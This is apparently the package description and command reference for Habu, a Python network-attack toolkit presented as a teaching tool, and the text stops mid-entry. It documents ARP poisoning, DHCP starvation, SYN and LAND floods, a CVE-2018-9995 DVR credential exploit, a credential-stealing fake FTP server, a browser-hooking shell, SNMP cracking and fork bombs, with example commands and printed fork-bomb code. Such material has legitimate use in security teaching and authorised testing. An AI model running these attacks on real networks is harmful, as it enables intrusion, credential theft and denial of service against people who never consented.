Python Hacking Toolkit
Project description
I’m developing Habu to teach (and learn) some concepts about Python and Network Hacking.
Some techniques implemented in the current version are:
ARP Poisoning
ARP Sniffing
DHCP Discover
DHCP Starvation
Fake FTP Server
LAND Attack
SNMP Cracking
Subdomains Identification
SSL/TLS Certificate Cloner
SYN Flooding
TCP Flags Analysis
TCP ISN Analysis
TCP Port Scan
Username check on social networks
Virtual Hosts Identification
Web Techonologies Identification
The development of this software is supported by Securetia SRL (https://www.securetia.com/)
Usage Videos
The following Youtube Playlist has videos that shows the installation and usage:
https://www.youtube.com/watch?v=rgp9seLLyqE&list=PL4HZnX8VnFXqSvNw7x-bXOn0dgxNdfnVD
Telegram Group
If you want to discuss some Habu features, possible improvements, etc, you can use the Habu Telegram Group: https://t.me/python_habu
Issues and pull requests must be sent to github repo: https://github.com/portantier/habu
Installation
Kali Linux:
You can install the package created for Kali Linux. See https://github.com/portantier/habu/releases
Python Package (PyPi):
Habu is on PyPi, so you can install it directly with pip:
` $ pip3 install habu `
Microsoft Windows:
Install it with the pip method.
Get Help
All the commands implement the option ‘–help’, that shows the help, arguments, options, and default values.
Verbose Mode
Almost all commands implement the verbose mode with the ‘-v’ option. This can give you some extra info about what habu is doing.
Commands Index
habu.arp.ping
Usage: habu.arp.ping [OPTIONS] IP
Send ARP packets to check if a host it's alive in the local network.
Example:
# habu.arp.ping 192.168.0.1
Ether / ARP is at a4:08:f5:19:17:a4 says 192.168.0.1 / Padding
Options:
-i TEXT Interface to use
-v Verbose output
--help Show this message and exit.habu.arp.poison
Usage: habu.arp.poison [OPTIONS] VICTIM1 VICTIM2
Send ARP 'is-at' packets to each victim, poisoning their ARP tables for
send the traffic to your system.
Note: If you want a full working Man In The Middle attack, you need to
enable the packet forwarding on your operating system to act like a
router. You can do that using:
# echo 1 > /proc/sys/net/ipv4/ip_forward
Example:
# habu.arpoison 192.168.0.1 192.168.0.77
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.70
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
...
Options:
-i TEXT Interface to use
-v Verbose
--help Show this message and exit.habu.arp.sniff
Usage: habu.arp.sniff [OPTIONS]
Listen for ARP packets and show information for each device.
Columns: Seconds from last packet | IP | MAC | Vendor
Example:
1 192.168.0.1 a4:08:f5:19:17:a4 Sagemcom Broadband SAS
7 192.168.0.2 64:bc:0c:33:e5:57 LG Electronics (Mobile Communications)
2 192.168.0.5 00:c2:c6:30:2c:58 Intel Corporate
6 192.168.0.7 54:f2:01:db:35:58 Samsung Electronics Co.,Ltd
Options:
-i TEXT Interface to use
--help Show this message and exit.habu.asydns
Usage: habu.asydns [OPTIONS]
Requests a DNS domain name based on public and private RSA keys using the
AsyDNS protocol https://github.com/portantier/asydns
Example:
$ habu.asydns -v
Generating RSA key ...
Loading RSA key ...
{
"ip": "181.31.41.231",
"name": "07286e90fd6e7e6be61d6a7919967c7cf3bbfb23a36edbc72b6d7c53.a.asydns.org"
}
$ dig +short 07286e90fd6e7e6be61d6a7919967c7cf3bbfb23a36edbc72b6d7c53.a.asydns.org
181.31.41.231
Options:
-u TEXT API URL
-g Force the generation of a new key pair
-r Revoke the public key
-v Verbose output
--help Show this message and exit.habu.b64
Usage: habu.b64 [OPTIONS] [F]
Encodes or decode data in base64, just like the command base64.
$ echo awesome | habu.b64
YXdlc29tZQo=
$ echo YXdlc29tZQo= | habu.b64 -d
awesome
Options:
-d decode instead of encode
--help Show this message and exit.habu.cert.clone
Usage: habu.cert.clone [OPTIONS] HOSTNAME PORT KEYFILE CERTFILE
Connect to an SSL/TLS server, get the certificate and generate a
certificate with the same options and field values.
Note: The generated certificate is invalid, but can be used for social
engineering attacks
Example:
$ habu.certclone www.google.com 443 /tmp/key.pem /tmp/cert.pem
Options:
--copy-extensions Copy certificate extensions (default: False)
--expired Generate an expired certificate (default: False)
-v Verbose
--help Show this message and exit.habu.cert.names
Usage: habu.cert.names [OPTIONS] [NETWORK]
Connects to each host/port and shows a summary of the certificate names.
The hosts to connect to are taken from two possible options:
1) -i option (stdin by default). A file where each line is a host or
network 2) An argument that can be a host or network
If you use both methods, the hosts and networks are merged into one list.
Example:
$ habu.cert.names 2.18.60.240/29
2.18.60.241 443 i.s-microsoft.com microsoft.com privacy.microsoft.com
2.18.60.242 443 aod-ssl.itunes.apple.com aod.itunes.apple.com aodp-ssl.itunes.apple.com
2.18.60.243 443 *.mlb.com mlb.com
2.18.60.244 443 [SSL: TLSV1_ALERT_INTERNAL_ERROR] tlsv1 alert internal error (_ssl.c:1056)
2.18.60.245 443 cert2-cn-public-ubiservices.ubi.com cert2-cn-public-ws-ubiservices.ubi.com
2.18.60.246 443 *.blog.sina.com.cn *.dmp.sina.cn
aod.itunes.apple.com aodp-ssl.itunes.apple.com aod-ssl.itunes.apple.com
*.blog.sina.com.cn cert2-cn-public-ubiservices.ubi.com cert2-cn-public-ws-
ubiservices.ubi.com *.dmp.sina.cn i.s-microsoft.com microsoft.com
*.mlb.com mlb.com privacy.microsoft.com
Options:
-p TEXT Ports to connect to (comma separated list)
-i FILENAME Input file (Default: stdin)
-t FLOAT Time to wait for each connection
-v Verbose output
--help Show this message and exit.habu.config.del
Usage: habu.config.del [OPTIONS] KEY
Delete a KEY from the configuration.
Note: By default, KEY is converted to uppercase.
Example:
$ habu.config.del DNS_SERVER
Options:
--help Show this message and exit.habu.config.set
Usage: habu.config.set [OPTIONS] KEY VALUE
Set VALUE to the config KEY.
Note: By default, KEY is converted to uppercase.
Example:
$ habu.config.set DNS_SERVER 8.8.8.8
Options:
--help Show this message and exit.habu.config.show
Usage: habu.config.show [OPTIONS]
Show the current config.
Note: By default, the options with 'KEY' in their name are shadowed.
Example:
$ habu.config.show
{
"DNS_SERVER": "8.8.8.8",
"FERNET_KEY": "*************"
}
Options:
--show-keys Show also the key values
--option TEXT... Write to the config(KEY VALUE)
--help Show this message and exit.habu.contest
Usage: habu.contest [OPTIONS]
Try to connect to various services and check if can reach them using your
internet connection.
Example:
$ habu.contest
IP: True
DNS: True
FTP: True
SSH: True
HTTP: True
HTTPS: True
Options:
--help Show this message and exit.habu.crack.luhn
Usage: habu.crack.luhn [OPTIONS] NUMBER
Having known values for a Luhn validated number, obtain the possible
unknown numbers.
Numbers that use the Luhn algorithm for validation are Credit Cards, IMEI,
National Provider Identifier in the United States, Canadian Social
Insurance Numbers, Israel ID Numbers and Greek Social Security Numbers
(ΑΜΚΑ).
The '-' characters are ignored.
Define the missing numbers with the 'x' character.
Reference: https://en.wikipedia.org/wiki/Luhn_algorithm
Example:
$ habu.crack.luhn 4509-xxxx-3160-6445
Options:
--help Show this message and exit.habu.crack.snmp
Usage: habu.crack.snmp [OPTIONS] IP
Launches snmp-get queries against an IP, and tells you when finds a valid
community string (is a simple SNMP cracker).
The dictionary used is the distributed with the onesixtyone tool
https://github.com/trailofbits/onesixtyone
Example:
# habu.crack.snmp 179.125.234.210
Community found: private
Community found: public
Note: You can also receive messages like \<UNIVERSAL\> \<class
'scapy.asn1.asn1.ASN1\_Class\_metaclass'\>, I don't know how to supress
them for now.
Options:
-p INTEGER Port to use
-c TEXT Community (default: list of most used)
-s Stop after first match
-v Verbose
--help Show this message and exit.habu.crtsh
Usage: habu.crtsh [OPTIONS] DOMAIN
Downloads the certificate transparency logs for a domain and check with
DNS queries if each subdomain exists.
Uses multithreading to improve the performance of the DNS queries.
Example:
$ sudo habu.crtsh securetia.com
[
"karma.securetia.com.",
"www.securetia.com."
]
Options:
-c Disable cache
-n Disable DNS subdomain validation
-v Verbose output
--help Show this message and exit.habu.cve.2018.9995
Usage: habu.cve.2018.9995 [OPTIONS] IP
Exploit the CVE-2018-9995 vulnerability, present on various DVR systems.
Note: Based on the original code from Ezequiel Fernandez (@capitan_alfa).
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9995
Example:
$ python habu.cve.2018-9995 82.202.102.42
[
{
"uid": "admin",
"pwd": "securepassword",
"role": 2,
"enmac": 0,
"mac": "00:00:00:00:00:00",
"playback": 4294967295,
"view": 4294967295,
"rview": 4294967295,
"ptz": 4294967295,
"backup": 4294967295,
"opt": 4294967295
}
]
Options:
-p INTEGER Port to use (default: 80)
-v Verbose
--help Show this message and exit.habu.cymon.ip
Usage: habu.cymon.ip [OPTIONS] IP
Simple cymon API client.
Prints the JSON result of a cymon IP query.
Example:
$ habu.cymon.ip 8.8.8.8
{
"addr": "8.8.8.8",
"created": "2015-03-23T12:03:42Z",
"updated": "2018-08-24T04:06:07Z",
"sources": [
"safeweb.norton.com",
"botscout.com",
"virustotal.com",
"phishtank"
],
"events": "https://www.cymon.io/api/nexus/v1/ip/8.8.8.8/events",
"domains": "https://www.cymon.io/api/nexus/v1/ip/8.8.8.8/domains",
"urls": "https://www.cymon.io/api/nexus/v1/ip/8.8.8.8/urls"
}
Options:
-c Disable cache
-v Verbose output
-o FILENAME Output file (default: stdout)
--help Show this message and exit.habu.cymon.ip.timeline
Usage: habu.cymon.ip.timeline [OPTIONS] IP
Simple cymon API client.
Prints the JSON result of a cymon IP timeline query.
Example:
$ habu.cymon.ip.timeline 8.8.8.8
{
"timeline": [
{
"time_label": "Aug. 18, 2018",
"events": [
{
"description": "Posted: 2018-08-18 23:37:39 CEST IDS Alerts: 0 URLQuery Alerts: 1 ...",
"created": "2018-08-18T21:39:07Z",
"title": "Malicious activity reported by urlquery.net",
"details_url": "http://urlquery.net/report/b1393866-9b1f-4a8e-b02b-9636989050f3",
"tag": "malicious activity"
}
]
},
...
Options:
-c Disable cache
-v Verbose output
-o FILENAME Output file (default: stdout)
-p Pretty output
--help Show this message and exit.habu.decrypt.gppref
Usage: habu.decrypt.gppref [OPTIONS] PASSWORD
Decrypt the password of local users added via Windows 2008 Group Policy
Preferences.
This value is the 'cpassword' attribute embedded in the Groups.xml file,
stored in the domain controller's Sysvol share.
Example:
# habu.decrypt.gppref AzVJmXh/J9KrU5n0czX1uBPLSUjzFE8j7dOltPD8tLk
testpassword
Options:
--help Show this message and exit.habu.dhcp.discover
Usage: habu.dhcp.discover [OPTIONS]
Send a DHCP request and show what devices has replied.
Note: Using '-v' you can see all the options (like DNS servers) included
on the responses.
# habu.dhcp_discover
Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.5:bootpc / BOOTP / DHCP
Options:
-i TEXT Interface to use
-t INTEGER Time (seconds) to wait for responses
-v Verbose output
--help Show this message and exit.habu.dhcp.starvation
Usage: habu.dhcp.starvation [OPTIONS]
Send multiple DHCP requests from forged MAC addresses to fill the DHCP
server leases.
When all the available network addresses are assigned, the DHCP server
don't send responses.
So, some attacks, like DHCP spoofing, can be made.
# habu.dhcp_starvation
Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.6:bootpc / BOOTP / DHCP
Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.7:bootpc / BOOTP / DHCP
Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.8:bootpc / BOOTP / DHCP
Options:
-i TEXT Interface to use
-t INTEGER Time (seconds) to wait for responses
-s INTEGER Time (seconds) between requests
-v Verbose output
--help Show this message and exit.habu.dns.lookup.forward
Usage: habu.dns.lookup.forward [OPTIONS] HOSTNAME
Perform a forward lookup of a given hostname.
Example:
$ habu.dns.lookup.forward google.com
{
"ipv4": "172.217.168.46",
"ipv6": "2a00:1450:400a:802::200e"
}
Options:
-v Verbose output
--help Show this message and exit.habu.dns.lookup.reverse
Usage: habu.dns.lookup.reverse [OPTIONS] IP_ADDRESS
Perform a reverse lookup of a given IP address.
Example:
$ $ habu.dns.lookup.reverse 8.8.8.8
{
"hostname": "google-public-dns-a.google.com"
}
Options:
-v Verbose output
--help Show this message and exit.habu.eicar
Usage: habu.eicar [OPTIONS]
Print the EICAR test string that can be used to test antimalware engines.
More info: http://www.eicar.org/86-0-Intended-use.html
Example:
$ habu.eicar
X5O!P%@AP[4\XZP54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Options:
--help Show this message and exit.habu.expand
Usage: habu.expand [OPTIONS]
Expand data to add interesting information.
Example:
$ cat /var/log/auth.log | habu.extract.ipv4 | habu.expand
[
{
"asset": "8.8.8.8",
"family": "IPAddress",
"asn": "15169",
"net": "8.8.8.0/24",
"cc": "US",
"rir": "ARIN",
"asname": "GOOGLE - Google LLC, US"
},
{
"asset": "8.8.4.4",
"family": "IPAddress",
"asn": "15169",
"net": "8.8.4.0/24",
"cc": "US",
"rir": "ARIN",
"asname": "GOOGLE - Google LLC, US"
}
]
Options:
-i FILENAME Input file (Default: stdin)
-v Verbose output
--help Show this message and exit.habu.extract.domain
Usage: habu.extract.domain [OPTIONS] [INFILE]
Extract valid domains from a file or stdin.
Optionally, check each domain for the presence of NS registers.
Example:
$ cat /var/log/some.log | habu.extract.domain -c
google.com
ibm.com
redhat.com
Options:
-c Check if domain has NS servers defined
-v Verbose output
-j JSON output
--help Show this message and exit.habu.extract.email
Usage: habu.extract.email [OPTIONS] [INFILE]
Extract email addresses from a file or stdin.
Example:
$ cat /var/log/auth.log | habu.extract.email
john@securetia.com
raven@acmecorp.net
nmarks@fimax.com
Options:
-v Verbose output
-j JSON output
--help Show this message and exit.habu.extract.hostname
Usage: habu.extract.hostname [OPTIONS] [INFILE]
Extract hostnames from a file or stdin.
Example:
$ cat /var/log/some.log | habu.extract.hostname
www.google.com
ibm.com
fileserver.redhat.com
Options:
-c Check if hostname resolves
-v Verbose output
-j JSON output
--help Show this message and exit.habu.extract.ipv4
Usage: habu.extract.ipv4 [OPTIONS] [INFILE]
Extract IPv4 addresses from a file or stdin.
Example:
$ cat /var/log/auth.log | habu.extract.ipv4
172.217.162.4
23.52.213.96
190.210.43.70
Options:
--json JSON output
-v Verbose output
--help Show this message and exit.habu.fernet
Usage: habu.fernet [OPTIONS]
Fernet cipher.
Uses AES-128-CBC with HMAC
Note: You must use a key to cipher with Fernet.
Use the -k paramenter or set the FERNET_KEY configuration value.
The keys can be generated with the command habu.fernet.genkey
Reference: https://github.com/fernet/spec/blob/master/Spec.md
Example:
$ "I want to protect this string" | habu.fernet
gAAAAABbXnCGoCULLuVNRElYTbEcwnek9iq5jBKq9JAN3wiiBUzPqpUgV5oWvnC6xfIA...
$ echo gAAAAABbXnCGoCULLuVNRElYTbEcwnek9iq5jBKq9JAN3wiiBUzPqpUgV5oWvnC6xfIA... | habu.fernet -d
I want to protect this string
Options:
-k TEXT Key
-d Decrypt instead of encrypt
--ttl INTEGER Time To Live for timestamp verification
-i FILENAME Input file (default: stdin)
-o FILENAME Output file (default: stdout)
--help Show this message and exit.habu.fernet.genkey
Usage: habu.fernet.genkey [OPTIONS]
Generate a new Fernet Key, optionally write it to ~/.habu.json
Example:
$ habu.fernet.genkey
xgvWCIvjwe9Uq7NBvwO796iI4dsGD623QOT9GWqnuhg=
Options:
-w Write this key to ~/.habu.json
--help Show this message and exit.habu.filter
Usage: habu.filter [OPTIONS] FIELD [gt|lt|eq|ne|ge|le|in|contains|defined|un
defined|true|false] [VALUE]
Filter data based on operators.
Example:
$ cat /var/log/auth.log | habu.extract.ipv4 | habu.expand | habu.filter cc eq US
[
{
"asset": "8.8.8.8",
"family": "IPAddress",
"asn": "15169",
"net": "8.8.8.0/24",
"cc": "US",
"rir": "ARIN",
"asname": "GOOGLE - Google LLC, US"
}
]
Options:
-i FILENAME Input file (Default: stdin)
-v Verbose output
--not Negate the comparison
--help Show this message and exit.habu.forkbomb
Usage: habu.forkbomb [OPTIONS] [bash|batch|c|haskell|perl|php|python|ruby]
A shortcut to remember how to use fork bombs in different languages.
Currently supported: bash, batch, c, haskell, perl, php, python, ruby.
Example:
$ habu.forkbomb c
#include <unistd.h>
int main()
{
while(1)
{
fork();
}
return 0;
}
Options:
--help Show this message and exit.habu.gateway.find
Usage: habu.gateway.find [OPTIONS] NETWORK
Try to reach an external IP using any host has a router.
Useful to find routers in your network.
First, uses arping to detect alive hosts and obtain MAC addresses.
Later, create a network packet and put each MAC address as destination.
Last, print the devices that forwarded correctly the packets.
Example:
# habu.find.gateway 192.168.0.0/24
192.168.0.1 a4:08:f5:19:17:a4 Sagemcom
192.168.0.7 b0:98:2b:5d:22:70 Sagemcom
192.168.0.8 b0:98:2b:5d:1f:e8 Sagemcom
Options:
-i TEXT Interface to use
--host TEXT Host to reach (default: 8.8.8.8)
--tcp Use TCP instead of ICMP
--dport INTEGER RANGE Destination port for TCP (default: 80)
--timeout INTEGER Timeout in seconds (default: 5)
-v Verbose output
--help Show this message and exit.habu.hasher
Usage: habu.hasher [OPTIONS] [F]
Compute various hashes for the input data, that can be a file or a stream.
Example:
$ habu.hasher README.rst
md5 992a833cd162047daaa6a236b8ac15ae README.rst
ripemd160 0566f9141e65e57cae93e0e3b70d1d8c2ccb0623 README.rst
sha1 d7dbfd2c5e2828eb22f776550c826e4166526253 README.rst
sha256 6bb22d927e1b6307ced616821a1877b6cc35e... README.rst
sha512 8743f3eb12a11cf3edcc16e400fb14d599b4a... README.rst
whirlpool 96bcc083242e796992c0f3462f330811f9e8c... README.rst
You can also specify which algorithm to use. In such case, the output is
only the value of the calculated hash:
$ habu.hasher -a md5 README.rst
992a833cd162047daaa6a236b8ac15ae README.rst
Options:
-a [md5|sha1|sha256|sha512|ripemd160|whirlpool]
Only this algorithm (Default: all)
--help Show this message and exit.habu.host
Usage: habu.host [OPTIONS]
Collect information about the host where habu is running.
Example:
$ habu.host
{
"kernel": [
"Linux",
"demo123",
"5.0.6-200.fc29.x86_64",
"#1 SMP Wed Apr 3 15:09:51 UTC 2019",
"x86_64",
"x86_64"
],
"distribution": [
"Fedora",
"29",
"Twenty Nine"
],
"libc": [
"glibc",
"2.2.5"
],
"arch": "x86_64",
"python_version": "3.7.3",
"os_name": "Linux",
"cpu": "x86_64",
"static_hostname": "demo123",
"fqdn": "demo123.lab.sierra"
}
Options:
-v Verbose output.
--help Show this message and exit.habu.http.headers
Usage: habu.http.headers [OPTIONS] SERVER
Retrieve the HTTP headers of a web server.
Example:
$ habu.http.headers http://duckduckgo.com
{
"Server": "nginx",
"Date": "Sun, 14 Apr 2019 00:00:55 GMT",
"Content-Type": "text/html",
"Content-Length": "178",
"Connection": "keep-alive",
"Location": "https://duckduckgo.com/",
"X-Frame-Options": "SAMEORIGIN",
"Content-Security-Policy": "default-src https: blob: data: 'unsafe-inline' 'unsafe-eval'",
"X-XSS-Protection": "1;mode=block",
"X-Content-Type-Options": "nosniff",
"Referrer-Policy": "origin",
"Expect-CT": "max-age=0",
"Expires": "Mon, 13 Apr 2020 00:00:55 GMT",
"Cache-Control": "max-age=31536000"
}
Options:
-v Verbose output
--help Show this message and exit.habu.http.options
Usage: habu.http.options [OPTIONS] SERVER
Retrieve the available HTTP methods of a web server.
Example:
$ habu.http.options -v http://google.com
{
"allowed": "GET, HEAD"
}
Options:
-v Verbose output
--help Show this message and exit.habu.interfaces
Usage: habu.interfaces [OPTIONS]
Show the network interfaces available on the system.
Example:
# habu.interfaces
# NAME MAC INET INET6
0 eth0 80:fa:5b:4b:f9:18 None None
1 lo 00:00:00:00:00:00 127.0.0.1 ::1
2 wlan0 f4:96:34:e5:ae:1b 192.168.0.6 None
3 vboxnet0 0a:00:27:00:00:00 192.168.56.1 fe80::800:27ff:fe00:0
Options:
-j Output in JSON format
--help Show this message and exit.habu.ip
Usage: habu.ip [OPTIONS]
Get the public IP address of the connection from https://api.ipify.org.
Example:
$ habu.ip
{
"ip_external": "80.219.53.185"
}
Options:
--help Show this message and exit.habu.ip2asn
Usage: habu.ip2asn [OPTIONS] IP
Use Team Cymru ip2asn service to get information about a public IPv4/IPv6.
Reference: https://www.team-cymru.com/IP-ASN-mapping.html
$ habu.ip2asn 8.8.8.8
{
"asn": "15169",
"net": "8.8.8.0/24",
"cc": "US",
"rir": "ARIN",
"asname": "GOOGLE - Google LLC, US",
"country": "United States"
}
Options:
--help Show this message and exit.habu.ip.geolocation
Usage: habu.ip.geolocation [OPTIONS] IP_ADDRESS
Get the geolocation of an IP adddress from https://ipapi.co/.
Example:
$ habu.ip.geolocation 8.8.8.8
{
"ip": "8.8.8.8",
"city": "Mountain View",
...
"asn": "AS15169",
"org": "Google LLC"
}
Options:
-v Verbose output.
--help Show this message and exit.habu.ip.internal
Usage: habu.ip.internal [OPTIONS]
Get the local IP address(es) of the local interfaces.
Example:
$ habu.ip.internal
{
"lo": {
"ipv4": [
{
"addr": "127.0.0.1",
"netmask": "255.0.0.0",
"peer": "127.0.0.1"
}
],
"link_layer": [
{
"addr": "00:00:00:00:00:00",
"peer": "00:00:00:00:00:00"
}
],
"ipv6": [
{
"addr": "::1",
"netmask": "ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"
}
]
},
...
Options:
-v Verbose output.
--help Show this message and exit.habu.isn
Usage: habu.isn [OPTIONS] IP
Create TCP connections and print the TCP initial sequence numbers for each
one.
$ sudo habu.isn -c 5 www.portantier.com
1962287220
1800895007
589617930
3393793979
469428558
Note: You can get a graphical representation (needs the matplotlib
package) using the '-g' option to better understand the randomness.
Options:
-p INTEGER Port to use (default: 80)
-c INTEGER How many packets to send/receive (default: 5)
-i TEXT Interface to use
-g Graph (requires matplotlib)
-v Verbose output
--help Show this message and exit.habu.jshell
Usage: habu.jshell [OPTIONS]
Control a web browser through Websockets.
Bind a port (default: 3333) and listen for HTTP connections.
On connection, send a JavaScript code that opens a WebSocket that can be
used to send commands to the connected browser.
You can write the commands directly in the shell, or use plugins, that are
simply external JavaScript files.
Using habu.jshell you can completely control a web browser.
Reference: https://developer.mozilla.org/en-US/docs/Web/API/WebSockets_API
Example:
$ habu.jshell
>> Listening on 192.168.0.10:3333. Waiting for a victim connection.
>> HTTP Request received from 192.168.0.15. Sending hookjs
>> Connection from 192.168.0.15
$ _sessions
0 * 192.168.0.15:33432 Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0
$ _info
{
"user-agent": "Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0",
"location": "http://192.168.0.10:3333/",
"java-enabled": false,
"platform": "Linux x86_64",
"app-code-name": "Mozilla",
"app-name": "Netscape",
"app-version": "5.0 (X11)",
"cookie-enabled": true,
"language": "es-AR",
"online": true
}
$ document.location
http://192.168.0.10:3333/
Options:
-v Verbose
-i TEXT IP to listen on
-p INTEGER Port to listen on
--help Show this message and exit.habu.karma
Usage: habu.karma [OPTIONS] HOST
Use the Karma service https://karma.securetia.com to check an IP against
various Threat Intelligence / Reputation lists.
$ habu.karma www.google.com
www.google.com -> 64.233.190.99
[
"hphosts_fsa",
"hphosts_psh",
"hphosts_emd"
]
Note: You can use the hostname or the IP of the host to query.
Options:
--help Show this message and exit.habu.karma.bulk
Usage: habu.karma.bulk [OPTIONS] [INFILE]
Show which IP addresses are inside blacklists using the Karma online
service.
Example:
$ cat /var/log/auth.log | habu.extract.ipv4 | habu.karma.bulk
172.217.162.4 spamhaus_drop,alienvault_spamming
23.52.213.96 CLEAN
190.210.43.70 alienvault_malicious
Options:
--json JSON output
--bad Show only entries in blacklists
-v Verbose output
--help Show this message and exit.habu.land
Usage: habu.land [OPTIONS] IP
This command implements the LAND attack, that sends packets forging the
source IP address to be the same that the destination IP. Also uses the
same source and destination port.
The attack is very old, and can be used to make a Denial of Service on old
systems, like Windows NT 4.0. More information here:
https://en.wikipedia.org/wiki/LAND
# sudo habu.land 172.16.0.10
............
Note: Each dot (.) is a sent packet. You can specify how many packets send
with the '-c' option. The default is never stop. Also, you can specify the
destination port, with the '-p' option.
Options:
-c INTEGER How many packets send (default: infinit)
-p INTEGER Port to use (default: 135)
-i TEXT Interface to use
-v Verbose
--help Show this message and exit.habu.nc
Usage: habu.nc [OPTIONS] HOST PORT
Some kind of netcat/ncat replacement.
The execution emulates the feeling of this popular tools.
Example:
$ habu.nc --crlf www.portantier.com 80
Connected to 45.77.113.133 80
HEAD / HTTP/1.0
HTTP/1.0 301 Moved Permanently
Date: Thu, 26 Jul 2018 21:10:51 GMT
Server: OpenBSD httpd
Connection: close
Content-Type: text/html
Content-Length: 443
Location: https://www.portantier.com/
Options:
--family [4|6|46] IP Address Family
--ssl Enable SSL
--crlf Use CRLF for EOL sequence
--protocol [tcp|udp] Layer 4 protocol to use
--source-ip TEXT Source IP to use
--source-port INTEGER RANGE Source port to use
--help Show this message and exit.habu.nmap.excluded
Usage: habu.nmap.excluded [OPTIONS]
Prints a random port that is not present on nmap-services file so is not
scanned automatically by nmap.
Useful for services like SSH or RDP, that are continuously scanned on
their default ports.
Example:
# habu.nmap.excluded
58567
Options:
-l INTEGER RANGE Lowest port to consider
-h INTEGER RANGE Highest port to consider
--help Show this message and exit.habu.nmap.open
Usage: habu.nmap.open [OPTIONS] SCANFILE
Read an nmap report and print the open ports.
Print the ports that has been resulted open reading the generated nmap
output.
You can use it to rapidly reutilize the port list for the input of other
tools.
Supports and detects the 3 output formats (nmap, gnmap and xml)
Example:
# habu.nmap.open portantier.nmap
22,80,443
Options:
-p [tcp|udp|sctp] The protocol (default=tcp)
--help Show this message and exit.habu.nmap.ports
Usage: habu.nmap.ports [OPTIONS] SCANFILE
Read an nmap report and print the tested ports.
Print the ports that has been tested reading the generated nmap output.
You can use it to rapidly reutilize the port list for the input of other
tools.
Supports and detects the 3 output formats (nmap, gnmap and xml)
Example:
# habu.nmap.ports portantier.nmap
21,22,23,80,443
Options:
-p [tcp|udp|sctp] The protocol (default=tcp)
--help Show this message and exit.habu.ping
Usage: habu.ping [OPTIONS] IP
The classic ping tool that send ICMP echo requests.
# habu.ping 8.8.8.8
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
Options:
-i TEXT Wich interface to use (default: auto)
-c INTEGER How many packets send (default: infinit)
-t INTEGER Timeout in seconds (default: 2)
-w INTEGER How many seconds between packets (default: 1)
-v Verbose
--help Show this message and exit.habu.protoscan
Usage: habu.protoscan [OPTIONS] IP
Send IP packets with different protocol field content to guess what layer
4 protocols are available.
The output shows which protocols doesn't generate a 'protocol-unreachable'
ICMP response.
Example:
$ sudo python cmd_ipscan.py 45.77.113.133
1 icmp
2 igmp
4 ipencap
6 tcp
17 udp
41 ipv6
47 gre
50 esp
51 ah
58 ipv6_icmp
97 etherip
112 vrrp
115 l2tp
132 sctp
137 mpls_in_ip
Options:
-i TEXT Interface to use
-t INTEGER Timeout for each probe (default: 2 seconds)
--all Probe all protocols (default: Defined in /etc/protocols)
-v Verbose output
--help Show this message and exit.habu.server.ftp
Usage: habu.server.ftp [OPTIONS]
Basic fake FTP server, whith the only purpose to steal user credentials.
Supports SSL/TLS.
Example:
# sudo habu.server.ftp --ssl --ssl-cert /tmp/cert.pem --ssl-key /tmp/key.pem
Listening on port 21
Accepted connection from ('192.168.0.27', 56832)
Credentials collected from 192.168.0.27! fabian 123456
Options:
-a TEXT Address to bind (default: all)
-p INTEGER Which port to use (default: 21)
--ssl Enable SSL/TLS (default: False)
--ssl-cert TEXT SSL/TLS Cert file
--ssl-key TEXT SSL/TLS Key file
-v Verbose
--help Show this message and exit.habu.shodan
Usage: habu.shodan [OPTIONS] IP
Simple shodan API client.
Prints the JSON result of a shodan query.
Example:
$ habu.shodan 8.8.8.8
{
"hostnames": [
"google-public-dns-a.google.com"
],
"country_code": "US",
"org": "Google",
"data": [
{
"isp": "Google",
"transport": "udp",
"data": "Recursion: enabled",
"asn": "AS15169",
"port": 53,
"hostnames": [
"google-public-dns-a.google.com"
]
}
],
"ports": [
53
]
}
Options:
-c Disable cache
-v Verbose output
-o FILENAME Output file (default: stdout)
--help Show this message and exit.habu.shodan.open
Usage: habu.shodan.open [OPTIONS] IP
Output the open ports for an IP against shodan (nmap format).
Example:
$ habu.shodan.open 8.8.8.8
T:53,U:53
Options:
-c Disable cache
-j Output in JSON format
-x Output an nmap command to scan open ports
-v Verbose output
-o FILENAME Output file (default: stdout)
--help Show this message and exit.habu.shodan.query
Usage: habu.shodan.query [OPTIONS] QUERY
Simple shodan API client.
Prints the JSON result of a shodan query.
Example:
$ habu.shodan 8.8.8.8
{
"hostnames": [
"google-public-dns-a.google.com"
],
"country_code": "US",
"org": "Google",
"data": [
{
"isp": "Google",
"transport": "udp",
"data": "Recursion: enabled",
"asn": "AS15169",
"port": 53,
"hostnames": [
"google-public-dns-a.google.com"
]
}
],
"ports": [
53
]
}
Options:
-c Disable cache
-v Verbose output
-o FILENAME Output file (default: stdout)
--help Show this message and exit.habu.synflood
Usage: habu.synflood [OPTIONS] IP
Launch a lot of TCP connections and keeps them opened.
Some very old systems can suffer a Denial of Service with this.
Reference: https://en.wikipedia.org/wiki/SYN_flood
Example:
# sudo habu.synflood 172.16.0.10
.................
Each dot is a packet sent.
You can use the options '-2' and '-3' to forge the layer 2/3 addresses.
If you use them, each connection will be sent from a random layer2 (MAC)
and/or layer3 (IP) address.
You can choose the number of connections to create with the option '-c'.
The default is never stop creating connections.
Note: If you send the packets from your real IP address and you want to
keep the connections half-open, you need to setup for firewall to don't
send the RST packets.
Options:
-i TEXT Wich interface to use (default: auto)
-c INTEGER How many packets send (default: infinit)
-p INTEGER Port to use (default: 135)
-2 Forge layer2/MAC address (default: No)
-3 Forge layer3/IP address (default: No)
-v Verbose
--help Show this message and exit.habu.tcpflags
Usage: habu.tcpflags [OPTIONS] IP
Send TCP packets with different flags and tell what responses receives.
It can be used to analyze how the different TCP/IP stack implementations
